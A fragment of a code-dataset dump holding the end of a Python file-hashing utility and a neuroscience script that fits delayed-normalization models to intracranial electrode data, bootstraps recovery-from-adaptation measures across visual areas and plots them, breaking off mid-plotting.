path)\n h_sha256 = hashlib.sha256()\n with open(path, 'rb') as hash_file:\n buf = hash_file.read(BLOCK_SIZE)\n while buf:\n h_sha256.update(buf)\n buf = hash_file.read(BLOCK_SIZE)\n\n return fops.makestr(h_sha256.hexdigest())\n\n\ndef hash_sha512(path: str) -> str:\n \"\"\"Creates a SHA512 hash for ``path``\n\n Args:\n path: Full path to file to create hash for.\n\n Returns:\n string form of SHA256 hash\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"Generating SHA512 hash for %s\", path)\n h_sha512 = hashlib.sha512()\n with open(path, 'rb') as hash_file:\n buf = hash_file.read(BLOCK_SIZE)\n while buf:\n h_sha512.update(buf)\n buf = hash_file.read(BLOCK_SIZE)\n\n return fops.makestr(h_sha512.hexdigest())\n","repo_name":"eljef/python_eljef_core","sub_path":"eljef/core/hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37677193904","text":"# required packages\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import lines\nimport statistics\nfrom sklearn.utils import resample\nfrom scipy.optimize import curve_fit\nfrom scipy.ndimage.filters import gaussian_filter1d\nimport seaborn as sns\n\n# import functions and scripts\nfrom utils import generate_stimulus_timecourse, import_info, import_epochs, select_events, select_events_repetitionTrials, d_prime_perImgCat, estimate_first_pulse\nfrom modelling_utils_paramInit import paramInit\nfrom modelling_utils_fitObjective import model_csDN, model_DN, model_csDN_withoutGeneralScaling, OF_ISI_recovery_log\n\n\n\"\"\"\n\nAuthor: A. Brands\n\n\"\"\"\n\n############################################################################################## ADAPT CODE HERES\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\n\n# define root directory\nfile = open('setDir.txt')\ndir = file.readline().strip('\\n')\nprint(dir)\n\n# specifiy the trial types\n# img_type = 'all'\n# img_type = 'preferred'\nimg_type = 'nonpreferred'\n\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\n\n# assign condition\nif img_type == 'all':\n preference = 0\nelif img_type == 'preferred':\n preference = 1\nelif img_type == 'nonpreferred':\n preference = 2\n\n# import timepoints of on- and offset of stimulus for one and twopulse trials\nt = np.loadtxt(dir+'variables/t.txt', dtype=float)\ntimepoints_onepulse = np.loadtxt(dir+'variables/timepoints_onepulse.txt', dtype=int)\ntimepoints_twopulse = np.loadtxt(dir+'variables/timepoints_twopulse.txt', dtype=int)\ntime_window = np.loadtxt(dir+'variables/time_window.txt', dtype=int)\ntempCond = np.loadtxt(dir+'variables/cond_temp.txt', dtype=float)\nlabel_tempCond = np.array(np.array(tempCond, dtype=int), dtype=str)\n\n# get img. classes\nstim_cat = np.loadtxt(dir+'variables/cond_stim.txt', dtype=str)\n\n# determine confidence interval (error)\nCI = 68\nCI_low = 50 - (0.5*CI)\nCI_high = 50 + (0.5*CI)\nB_repetitions = 1000\n\n# trials used for computing the ratio of the second and first peak\ntrials = ['onepulse-4', 'twopulse', 'twopulse_repeat']\naxis = [None, 'TEMP', 'TEMP']\n\n# define model\n# model = 'DN'\nmodel = 'csDN'\n# model = 'csDN_withoutGeneralScaling'\n\n# retrieve parameters\nparams_names, _, _, _ = paramInit(model)\nsample_rate = 512\n\n# create stimulus timecourse\nstim_twopulse = np.zeros((len(tempCond), len(t))) \nfor i in range(len(tempCond)):\n stim_twopulse[i, :] = generate_stimulus_timecourse(trials[2], i, dir)\nstim_onepulse = generate_stimulus_timecourse('onepulse', 3, dir)\n\n# visual areas (labels)\nVA = ['V1-V3', 'VOTC', 'LOTC']\nVA_n = np.zeros(len(VA)) # number of electrodes\nVA_labels = ['V1-V3', 'VOTC', 'LOTC']\ncolors_VA = [[233, 167, 0], [48, 64, 141], [187, 38, 102]]\n\n# electrode coordinates\nelectrodes_visuallyResponsive = pd.read_csv(dir+'subject_data/electrodes_visuallyResponsive_manuallyAssigned.txt', header=0, index_col=0, delimiter=' ')\nn_electrodes = len(electrodes_visuallyResponsive)\n\n# extract electrode indices per visual area (i.e. V1-V3, LOTC, VOTC)\nVA_name_idx_temp = {}\nfor i in range(n_electrodes):\n VA_name_current = electrodes_visuallyResponsive.loc[i, 'varea']\n if VA_name_current not in VA_name_idx_temp:\n VA_name_idx_temp[VA_name_current] = [i]\n else:\n VA_name_idx_temp[VA_name_current].append(i)\nVA_name_idx = {}\nVA_name_idx = {k: VA_name_idx_temp[k] for k in VA}\nprint(VA_name_idx, '\\n')\n\n# fit curve for recovery of adaptation initial parameter values\np0 = [1, 0]\n\n# timescales to fit and plot curves\nt1_plot = np.linspace(min(tempCond), max(tempCond), 1000)\n\n############################################################################\n################################################################### ANALYSIS\n\n# initiate dataframes to store data\nbroadband = []\nbroadband_pulse1 = []\nbroadband_pulse2 = []\n\nbroadband_bootstrap = []\nbroadband_pulse1_bootstrap = []\nbroadband_pulse2_pred_bootstrap = []\n\nbroadband_pred = []\nbroadband_pulse1_pred = []\nbroadband_pulse2_pred = []\n\nbroadband_pred_bootstrap = []\nbroadband_pulse1_pred_bootstrap = []\nbroadband_pulse2_bootstrap = []\n\nISI_recovery = []\nISI_recovery_bootstrap = []\nISI_recovery_avg = np.zeros((len(VA), len(tempCond)))\nISI_recovery_CI = np.zeros((len(VA), len(tempCond), 2))\nISI_recovery_log = np.zeros((len(VA), len(t1_plot)))\n\nISI_recovery_pred = []\nISI_recovery_pred_bootstrap = []\nISI_recovery_pred_avg = np.zeros((len(VA), len(tempCond)))\nISI_recovery_pred_CI = np.zeros((len(VA), len(tempCond), 2))\nISI_recovery_pred_log = np.zeros((len(VA), len(t1_plot)))\n\nadaptation = []\nadaptation_avg = np.zeros(len(VA))\nadaptation_CI = np.zeros((len(VA), 2))\n\nadaptation_pred = []\nadaptation_pred_avg = np.zeros(len(VA))\nadaptation_pred_CI = np.zeros((len(VA), 2))\n\nintercept = []\nintercept_avg = np.zeros(len(VA))\nintercept_CI = np.zeros((len(VA), 2))\n\nintercept_pred = []\nintercept_pred_avg = np.zeros(len(VA))\nintercept_pred_CI = np.zeros((len(VA), 2))\n\n# save medians for statistical testing\nadaptation_medians = np.zeros((len(VA), B_repetitions))\nadaptation_pred_medians = np.zeros((len(VA), B_repetitions))\n\nintercept_medians = np.zeros((len(VA), B_repetitions))\nintercept_pred_medians = np.zeros((len(VA), B_repetitions))\n\ncurrent_subject = ''\ncount_VA = 0\nfor key, value in VA_name_idx.items():\n\n # count number of electrodes\n n_electrodes = len(value)\n VA_n[count_VA] = n_electrodes\n\n # initiat dataframes\n broadband_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n broadband_pred_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n\n broadband_pulse1_current = np.zeros((n_electrodes, len(t)))\n broadband_pulse1_pred_current = np.zeros((n_electrodes, len(t)))\n\n broadband_pulse2_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n broadband_pulse2_pred_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n\n broadband_bootstrap_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n broadband_bootstrap_pred_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n\n broadband_pulse1_bootstrap_current = np.zeros((B_repetitions, len(t)))\n broadband_pulse1_bootstrap_pred_current = np.zeros((B_repetitions, len(t)))\n\n broadband_pulse2_bootstrap_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n broadband_pulse2_bootstrap_pred_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n\n ISI_recovery_current = np.zeros((B_repetitions, len(tempCond)))\n ISI_recovery_pred_current = np.zeros((B_repetitions, len(tempCond)))\n\n ISI_recovery_bootstrap_current = np.zeros((B_repetitions, len(tempCond)))\n ISI_recovery_bootstrap_pred_current = np.zeros((B_repetitions, len(tempCond)))\n\n adaptation_current = np.zeros(B_repetitions)\n adaptation_pred_current = np.zeros(B_repetitions)\n\n intercept_current = np.zeros(B_repetitions)\n intercept_pred_current = np.zeros(B_repetitions)\n\n # iterate over electrodes\n for i in range(n_electrodes):\n # for i in range(1):\n\n # retrieve info current electrode\n subject = electrodes_visuallyResponsive.subject[value[i]]\n electrode_name = electrodes_visuallyResponsive.electrode[value[i]]\n electrode_idx = int(electrodes_visuallyResponsive.electrode_idx[value[i]])\n\n # print progress\n print(30*'-')\n print(key)\n print(30*'-')\n print('Computing trials for ' + subject + ', electrode ' + electrode_name + ' (' + str(i+1) + '/' + str(n_electrodes) + ')')\n\n # retrieve model parameters for current electrode\n temp = pd.read_csv(dir+'modelFit/visuallyResponsive/' + subject + '_' + electrode_name + '/param_' + model + '.txt', header=0, delimiter=' ', index_col=0)\n temp.reset_index(inplace=True,drop=True)\n params_current = list(temp.loc[0, params_names])\n\n if current_subject != subject:\n\n # update current subject\n current_subject = subject\n\n # import info\n _, events, channels, _ = import_info(subject, dir)\n\n # import excluded trials\n excluded_epochs = pd.read_csv(dir+'subject_data/' + subject + '/excluded_epochs.txt', sep=' ', header=0, dtype=int)\n\n # extract data\n epochs_b = import_epochs(subject, electrode_idx, dir)\n index_epochs_b = [j for j in range(len(events)) if excluded_epochs.iloc[electrode_idx, j+1] == 1]\n epochs_b.iloc[:, index_epochs_b] = np.nan\n\n # extract data\n cat = None\n if (img_type == 'preferred') | (img_type == 'nonpreferred'):\n\n # determine category selectivity\n event_idx_onepulse = select_events(events, 'STIM', 'onepulse', dir)\n d_prime_temp = d_prime_perImgCat(epochs_b, event_idx_onepulse, stim_cat).tolist() # double-check for/confirm img. category selection\n\n preferred_cat_index = np.argmax(d_prime_temp[0:-1]) # P\n preferred_cat = stim_cat[preferred_cat_index]\n\n npreferred_cat_index = np.argmin(d_prime_temp[0:-1]) # NP\n npreferred_cat = stim_cat[npreferred_cat_index]\n\n print('Preferred img. cat.: ', preferred_cat)\n cat = [preferred_cat, npreferred_cat]\n\n # select events\n event_idx = select_events_repetitionTrials(events, tempCond, preference, cat)\n \n else:\n\n # select events\n event_idx = select_events_repetitionTrials(events, tempCond, preference) \n\n # get onepulse trials\n # NEURAL DATA\n data_first_pulse = estimate_first_pulse(t, epochs_b, event_idx, timepoints_twopulse)\n broadband_pulse1_current[i, :] = data_first_pulse\n\n # for 5 remaining img classes\n if model == 'csDN':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif preference == 1: # preferred\n _, broadband_pulse1_pred_current[i, :] = model_csDN(stim_onepulse, 'onepulse', 3, cat[0], sample_rate, params_current, dir) \n elif preference == 2: # nonpreferred\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif model == 'csDN_withoutGeneralScaling':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN_withoutGeneralScaling(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif preference == 1: # preferred\n _, broadband_pulse1_pred_current[i, :] = model_csDN_withoutGeneralScaling(stim_onepulse, 'onepulse', 3, cat[0], sample_rate, params_current, dir) \n elif preference == 2: # nonpreferred\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN_withoutGeneralScaling(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif model == 'DN':\n broadband_pulse1_pred_current[i, :] = model_DN(stim_onepulse[j, :], sample_rate, params_current)\n\n # retrieve broadband data\n for j in range(len(tempCond)):\n\n # select twouplse\n # NEURAL DATA\n broadband_current[i, j, :] = np.nanmean(epochs_b[event_idx[2][j]], axis=1)\n\n # MODEL\n if model == 'csDN':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif preference == 1:\n _, broadband_pred_current[i, j, :] = model_csDN(stim_twopulse[j, :], 'twopulse_repeat', j, cat[0], sample_rate, params_current, dir) \n elif preference == 2:\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif model == 'csDN_withoutGeneralScaling':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN_withoutGeneralScaling(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif preference == 1:\n _, broadband_pred_current[i, j, :] = model_csDN_withoutGeneralScaling(stim_twopulse[j, :], 'twopulse_repeat', j, cat[0], sample_rate, params_current, dir) \n elif preference == 2:\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN_withoutGeneralScaling(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif model == 'DN':\n broadband_pred_current[i, j, :] = model_DN(stim_twopulse[j, :], sample_rate, params_current)\n \n # compute isolated second pulse\n # NEURAL DATA\n broadband_pulse2_current[i, j, :] = broadband_current[i, j, :] - data_first_pulse\n\n # MODEL\n broadband_pulse2_pred_current[i, j, :] = broadband_pred_current[i, j, :] - broadband_pulse1_pred_current[i, :]\n\n # perform bootstrap over broadband timecourse\n ISI_recovery_log_current = np.zeros((B_repetitions, len(t1_plot)))\n ISI_recovery_log_pred_current = np.zeros((B_repetitions, len(t1_plot)))\n for i in range(B_repetitions):\n\n # draw random sample\n idx_temp = np.arange(n_electrodes)\n n_samples = len(idx_temp)\n boot = resample(idx_temp, replace=True, n_samples=n_samples)\n\n # compute first pulse\n data_mean = np.zeros((len(boot), len(t)))\n model_mean = np.zeros((len(boot), len(t)))\n for l in range(len(boot)):\n data_mean[l, :] = broadband_pulse1_current[boot[l], :]\n model_mean[l, :] = broadband_pulse1_pred_current[boot[l], :]\n broadband_pulse1_bootstrap_current[i, :] = np.nanmean(data_mean, 0)\n broadband_pulse1_bootstrap_pred_current[i, :] = np.nanmean(model_mean, 0)\n\n # compute tempCond recovery\n adaptation_temp = np.zeros(len(tempCond))\n adaptation_pred_temp = np.zeros(len(tempCond))\n \n for j in range(len(tempCond)):\n\n # compute degree of recovery\n start_firstpulse = timepoints_onepulse[0, 0]\n start_second_pulse = timepoints_twopulse[j, 2]\n\n # retrieve broadband\n # NEURAL DATA\n data = np.zeros((len(boot), len(t)))\n data_pulse1 = np.zeros((len(boot), len(t)))\n for l in range(len(boot)):\n data[l, :] = broadband_current[boot[l], j, :]\n data_pulse1[l, :] = broadband_pulse2_current[boot[l], j, :]\n broadband_bootstrap_current[i, j, :] = np.nanmean(data, 0)\n broadband_pulse2_bootstrap_current[i, j, :] = np.nanmean(data_pulse1, 0)\n\n # compute degree of recovery\n AUC1 = np.trapz(broadband_pulse1_bootstrap_current[i, :][start_firstpulse: start_firstpulse+time_window])\n AUC2 = np.trapz(broadband_pulse2_bootstrap_current[i, j, :][start_second_pulse:start_second_pulse+time_window])\n\n ISI_recovery_bootstrap_current[i, j] = AUC2/AUC1\n adaptation_temp[j] = AUC2/AUC1\n\n # MODEL\n pred = np.zeros((len(boot), len(t)))\n pred_pulse1 = np.zeros((len(boot), len(t)))\n for l in range(len(boot)):\n pred[l, :] = broadband_pred_current[boot[l], j, :]\n pred_pulse1[l, :] = broadband_pulse2_pred_current[boot[l], j, :]\n broadband_bootstrap_pred_current[i, j, :] = np.nanmean(pred, 0)\n broadband_pulse2_bootstrap_pred_current[i, j, :] = np.nanmean(pred_pulse1, 0)\n \n # compute degree of recovery\n AUC1 = np.trapz(broadband_pulse1_bootstrap_pred_current[i, :][start_firstpulse: start_firstpulse+time_window])\n AUC2 = np.trapz(broadband_pulse2_bootstrap_pred_current[i, j, :][start_second_pulse:start_second_pulse+time_window])\n\n ISI_recovery_bootstrap_pred_current[i, j] = AUC2/AUC1\n adaptation_pred_temp[j] = AUC2/AUC1\n\n # normalize responses to maximum (over all temporal conditions)\n broadband_bootstrap_current[i, :, :] = broadband_bootstrap_current[i, :, :]/np.amax(broadband_bootstrap_current[i, :, :]) \n broadband_bootstrap_pred_current[i, :, :] = broadband_bootstrap_pred_current[i, :, :]/np.amax(broadband_bootstrap_pred_current[i, :, :]) \n \n # NEURAL DATA\n # popt, _ = curve_fit(OF_ISI_recovery_log, tempCond, tempCond_recovery_bootstrap_current[i, :], p0, maxfev=100000) #, bounds=((0, 0), (np.inf, np.inf)))\n popt, _ = curve_fit(OF_ISI_recovery_log, tempCond/1000, adaptation_temp, p0, maxfev=1000) #, bounds=((0, 0), (np.inf, np.inf)))\n ISI_recovery_log_current[i, :] = OF_ISI_recovery_log(t1_plot/1000, *popt)\n intercept_current[i] = popt[0]\n intercept_medians[count_VA, i] = popt[0]\n adaptation_current[i] = np.mean(ISI_recovery_bootstrap_current[i, :])\n adaptation_medians[count_VA, i] = np.mean(ISI_recovery_bootstrap_current[i, :])\n\n # MODEL\n popt, _ = curve_fit(OF_ISI_recovery_log, tempCond/1000, adaptation_pred_temp, p0, maxfev=1000) #, bounds=((0, 0), (np.inf, np.inf)))\n ISI_recovery_log_pred_current[i, :] = OF_ISI_recovery_log(t1_plot/1000, *popt)\n intercept_pred_current[i] = popt[0]\n intercept_pred_medians[count_VA, i] = popt[0]\n adaptation_pred_current[i] = np.mean(ISI_recovery_bootstrap_pred_current[i, :])\n adaptation_pred_medians[count_VA, i] = np.mean(ISI_recovery_bootstrap_pred_current[i, :])\n\n # compute spread\n # NEURAL DATA\n adaptation_avg[count_VA] = np.mean(adaptation_current)\n adaptation_CI[count_VA, :] = np.nanpercentile(adaptation_current, [CI_low, CI_high])\n\n intercept_avg[count_VA] = np.mean(intercept_current)\n intercept_CI[count_VA, :] = np.nanpercentile(intercept_current, [CI_low, CI_high])\n\n ISI_recovery_log[count_VA] = np.mean(ISI_recovery_log_current, 0)\n for i in range(len(tempCond)):\n ISI_recovery_avg[count_VA, i] = np.mean(ISI_recovery_bootstrap_current[:, i])\n ISI_recovery_CI[count_VA, i, :] = np.nanpercentile(ISI_recovery_bootstrap_current[:, i], [CI_low, CI_high])\n\n # MODEL\n adaptation_pred_avg[count_VA] = np.mean(adaptation_pred_current)\n adaptation_pred_CI[count_VA, :] = np.nanpercentile(adaptation_pred_current, [CI_low, CI_high])\n\n intercept_pred_avg[count_VA] = np.mean(intercept_pred_current)\n intercept_pred_CI[count_VA, :] = np.nanpercentile(intercept_pred_current, [CI_low, CI_high])\n\n ISI_recovery_pred_log[count_VA] = np.mean(ISI_recovery_log_pred_current, 0)\n for i in range(len(tempCond)):\n ISI_recovery_pred_avg[count_VA, i] = np.mean(ISI_recovery_bootstrap_pred_current[:, i])\n ISI_recovery_pred_CI[count_VA, i, :] = np.nanpercentile(ISI_recovery_bootstrap_pred_current[:, i], [CI_low, CI_high])\n\n # append dataframes\n # NEURAL DATA\n broadband.append(broadband_current)\n broadband_pulse1.append(broadband_pulse1_current)\n broadband_pulse2.append(broadband_pulse2_current)\n\n broadband_bootstrap.append(broadband_bootstrap_current)\n broadband_pulse1_bootstrap.append(broadband_pulse1_bootstrap_current)\n broadband_pulse2_bootstrap.append(broadband_pulse2_bootstrap_current)\n\n ISI_recovery.append(ISI_recovery_current)\n ISI_recovery_bootstrap.append(ISI_recovery_bootstrap_current)\n\n adaptation.append(adaptation_current)\n intercept.append(intercept_current)\n\n # MODEL\n broadband_pred.append(broadband_pred_current)\n broadband_pulse1_pred.append(broadband_pulse1_pred_current)\n broadband_pulse2_pred.append(broadband_pulse2_pred_current)\n\n broadband_pred_bootstrap.append(broadband_bootstrap_pred_current)\n broadband_pulse1_pred_bootstrap.append(broadband_pulse1_bootstrap_pred_current)\n broadband_pulse2_pred_bootstrap.append(broadband_pulse2_bootstrap_pred_current)\n\n ISI_recovery_pred.append(ISI_recovery_pred_current)\n ISI_recovery_pred_bootstrap.append(ISI_recovery_bootstrap_pred_current)\n\n adaptation_pred.append(adaptation_pred_current)\n intercept_pred.append(intercept_pred_current)\n\n # increment count\n count_VA+=1\n\n\n############################################################################\n############################################################### PLOT RESULTS\n\n# initiate figure\nfig = plt.figure(figsize=(18, 24))\ngs = fig.add_gridspec(36, 20)\nax = dict()\n\n# initiate plots\nax['broadband'] = fig.add_subplot(gs[0:3, 0:20])\nax['broadband_pred'] = fig.add_subplot(gs[4:7, 0:20])\n\nax['broadband_isolation_E'] = fig.add_subplot(gs[10:14, 0:3])\nax['broadband_isolation_V'] = fig.add_subplot(gs[10:14, 7:10])\nax['broadband_isolation_L'] = fig.add_subplot(gs[10:14, 14:17])\nax_broadband_isolation = [ax['broadband_isolation_E'], ax['broadband_isolation_V'], ax['broadband_isolation_L']]\n\nax['broadband_isolation_E_pred'] = fig.add_subplot(gs[10:14, 3:6])\nax['broadband_isolation_V_pred'] = fig.add_subplot(gs[10:14, 10:13])\nax['broadband_isolation_L_pred'] = fig.add_subplot(gs[10:14, 17:20])\nax_broadband_isolation_pred = [ax['broadband_isolation_E_pred'], ax['broadband_isolation_V_pred'], ax['broadband_isolation_L_pred']]\n\nax['ISI_recovery'] = fig.add_subplot(gs[17:24, 0:9]) \nax['ISI_recovery_pred'] = fig.add_subplot(gs[17:24, 11:20]) \n\nax['adaptation'] = fig.add_subplot(gs[30:36, 0:8])\nax['intercept'] = fig.add_subplot(gs[30:36, 12:20])\n\n# seperate axes\nsns.despine(offset=10)\n\n# set ticks\nadd = np.zeros((len(VA), len(tempCond)))\nstart_add = [0.016, 0.017, 0.018]\nadd[:, 0] = start_add\nfor i in range(len(VA)):\n for j in range(1, len(tempCond)):\n add[i, j] = add[i, j - 1]*2\n\n# plot specs/adjustments\nstart = 50\nend = 700\nsep = 100\n\n# fontsizes\nfontsize_tick = 20\nfontsize_legend = 20\nfontsize_label = 20\n\n# initiate legend data holders\nline = []\nmarker = []\nmarker_pred = []\n\n# plot styles\nalpha = np.linspace(0.2, 1, len(tempCond))\nlinestyle = ['solid', 'solid', 'solid']\nlw = 2\n\n# metrics scatter points\ns = 120\n\n# y limits\ny_lim_in_isolation = [[-0.2, 1.1], [-0.2, 1.1], [-0.2, 1.1]]\ny_lim_recovery = [25, 120]\ny_lim_metrics = [-0.5, 2.7]\n\n# compute timepoint of the start of both first and second pulse\nstart_1 = timepoints_twopulse[0, 0]\n\n# adjust axes\nax['broadband'].spines['top'].set_visible(False)\nax['broadband'].spines['right'].set_visible(False)\nax['broadband'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['broadband'].axhline(0, color='grey', lw=0.5, alpha=0.5)\nax['broadband'].set_ylim(-0.2, 1.1)\n# ax['broadband'].set_ylabel('Neural data', fontsize=fontsize_label)\n\nax['broadband_pred'].spines['top'].set_visible(False)\nax['broadband_pred'].spines['right'].set_visible(False)\nax['broadband_pred'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['broadband_pred'].axhline(0, color='grey', lw=0.5, alpha=0.5)\nax['broadband_pred'].set_ylim(-0.2, 1.1)\n# ax['broadband_pred'].set_xlabel('ISI (ms)', fontsize=fontsize_label)\n# ax['broadband_pred'].set_ylabel('DN model', fontsize=fontsize_label)\n\nfor i in range(len(ax_broadband_isolation)):\n ax_broadband_isolation[i].spines['top'].set_visible(False)\n ax_broadband_isolation[i].spines['right'].set_visible(False)\n ax_broadband_isolation[i].tick_params(axis='both', which='major', labelsize=fontsize_tick)\n ax_broadband_isolation[i].axhline(0, color='grey', lw=0.5, alpha=0.5)\n ax_broadband_isolation[i].set_xlabel('Time (ms)', fontsize=fontsize_label)\n ax_broadband_isolation[i].set_ylim(y_lim_in_isolation[i])\n ax_broadband_isolation[i].set_xticks([0, 200])\n # ax_broadband_isolation[i].set_title('Neural data', fontsize=fontsize_title)\n # if i == 0:\n # ax_broadband_isolation[i].set_ylabel('Change in power (x-fold)', fontsize=fontsize_label)\n\nfor i in range(len(ax_broadband_isolation_pred)):\n ax_broadband_isolation_pred[i].spines['top'].set_visible(False)\n ax_broadband_isolation_pred[i].spines['right'].set_visible(False)\n ax_broadband_isolation_pred[i].tick_params(axis='both', which='major', labelsize=fontsize_tick)\n ax_broadband_isolation_pred[i].axhline(0, color='grey', lw=0.5, alpha=0.5)\n ax_broadband_isolation_pred[i].set_xlabel('Time (ms)', fontsize=fontsize_label)\n ax_broadband_isolation_pred[i].set_ylim(y_lim_in_isolation[i])\n ax_broadband_isolation_pred[i].set_yticklabels([])\n ax_broadband_isolation_pred[i].set_xticks([0, 200])\n # ax_broadband_isolation_pred[i].set_title('DN model', fontsize=fontsize_title)\n\n# ax['ISI_recovery'].set_xlabel('ISI (ms)', fontsize=fontsize_label)\n# ax['ISI_recovery'].set_ylabel('Recovery (%)', fontsize=fontsize_label)\nax['ISI_recovery'].set_ylim(y_lim_recovery)\nax['ISI_recovery'].axhline(100, color='grey', linestyle='dotted')\nax['ISI_recovery'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['ISI_recovery'].set_xticks(add[1, :])\nax['ISI_recovery'].set_xticklabels(label_tempCond, rotation=45)\nax['ISI_recovery'].spines['top'].set_visible(False)\nax['ISI_recovery'].spines['right'].set_visible(False)\nif preference == 0:\n ax['ISI_recovery'].set_ylim(20, 120)\nelif preference == 1:\n ax['ISI_recovery'].set_ylim(10, 120)\nelif preference == 2:\n ax['ISI_recovery'].set_ylim(20, 120)\n\n# ax['ISI_recovery_pred'].set_xlabel('ISI (ms)', fontsize=fontsize_label)\n# ax['ISI_recovery_pred'].set_ylabel('Recovery (%)', fontsize=fontsize_label)\nax['ISI_recovery_pred'].set_ylim(y_lim_recovery)\nax['ISI_recovery_pred'].axhline(100, color='grey', linestyle='dotted')\nax['ISI_recovery_pred'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['ISI_recovery_pred'].set_xticks(add[1, :])\nax['ISI_recovery_pred'].set_xticklabels(label_tempCond, rotation=45)\nax['ISI_recovery_pred'].spines['top'].set_visible(False)\nax['ISI_recovery_pred'].spines['right'].set_visible(False)\nif preference == 0:\n ax['ISI_recovery_pred'].set_ylim(20, 120)\nelif preference == 1:\n ax['ISI_recovery_pred'].set_ylim(10, 120)\nelif preference == 2:\n ax['ISI_recovery_pred'].set_ylim(20, 120)\n\nax['adaptation'].spines['top'].set_visible(False)\nax['adaptation'].spines['right'].set_visible(False)\nax['adaptation'].set_xticks(np.arange(len(VA))+0.1)\nax['adaptation'].set_xlim(y_lim_metrics)\nax['adaptation'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['adaptation'].set_xticklabels(VA_labels, fontsize=fontsize_label)\n# ax['adaptation'].set_ylabel('Avg. recovery (%)', fontsize=fontsize_label)\nif preference == 0:\n ax['adaptation'].set_ylim(30, 80)\nelif preference == 1:\n ax['adaptation'].set_ylim(30, 80)\nelif preference == 2:\n ax['adaptation'].set_ylim(30, 80)\n\nax['intercept'].spines['top'].set_visible(False)\nax['intercept'].spines['right'].set_visible(False)\nax['intercept'].set_xticks(np.arange(len(VA))+0.1)\nax['intercept'].set_xlim(y_lim_metrics)\nax['intercept'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['intercept'].set_xticklabels(VA_labels, fontsize=fontsize_label)\n# ax['intercept'].set_ylabel('Long-term recovery (%)', fontsize=fontsize_label)\nif preference == 0:\n ax['intercept'].set_ylim(55, 110)\nelif preference == 1:\n ax['intercept'].set_ylim(45, 120)\nelif preference == 2:\n ax['intercept'].set_ylim(55, 120)\n\n# plot first pulse in isolation\nmax_data = [0, 0, 0]\nmax_model = [0, 0, 0]\nfor i in range(len(VA)):\n\n # NEURAL DATA\n data_pulse1 = np.mean(broadband_pulse1_bootstrap[i], axis=0)\n max_data[i] = max(data_pulse1)\n data_temp = gaussian_filter1d(data_pulse1[start_1 - start: start_1 - start + time_window]/max_data[i], 10)\n ax_broadband_isolation[i].plot(np.arange(time_window), data_temp, color='black', zorder=1)\n\n # MODEL\n data_pulse1 = np.mean(broadband_pulse1_pred_bootstrap[i], axis=0)\n max_model[i] = max(data_pulse1)\n model_temp = gaussian_filter1d(data_pulse1[start_1 - start: start_1 - start + time_window]/max_model[i], 10)\n ax_broadband_isolation_pred[i].plot(np.arange(time_window), model_temp, color='black', zorder=1)\n\n# plot stimulus timecourse and time courses of neural data & model\nt_zero = np.argwhere(t > 0)[0][0]\nt_twohundred = np.argwhere(t > 0.5)[0][0]\n\nx_label_single = ['0', 